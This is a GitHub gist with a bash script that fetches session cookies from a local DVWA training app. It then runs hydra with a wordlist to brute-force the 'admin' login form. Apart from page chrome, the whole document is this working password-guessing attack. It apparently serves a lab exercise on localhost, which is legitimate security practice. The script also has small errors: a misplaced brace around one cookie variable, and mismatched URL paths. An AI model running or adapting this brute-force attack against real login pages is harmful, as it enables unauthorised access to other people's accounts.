Skip to content

Instantly share code, notes, and snippets.

@11philip22

11philip22/brute-low.sh

Created August 13, 2019 07:57
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 11philip22/7b24d936d096bf2f75841f8392f3a288 to your computer and use it in GitHub Desktop.
Save 11philip22/7b24d936d096bf2f75841f8392f3a288 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
brute-low.sh
#!/bin/bash
ip=localhost
koekje1=$(curl http://localhost/vulnerabilities/brute/ -s0 -I | grep "Set-Cookie" | sed -n '1!p' | sed 's/[^ ]* *//' | awk '{gsub("; path=/", "");print}' | grep security )
koekje2=$(curl http://localhost/vulnerabilities/brute/ -s0 -I | grep "Set-Cookie" | sed -n '1!p' | sed 's/[^ ]* *//' | awk '{gsub("; path=/", "");print}' | grep PHPSESSID)
hydra $ip -l admin -P /home/philip/wordlist.txt http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: ${koekje1};{$koekje2}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment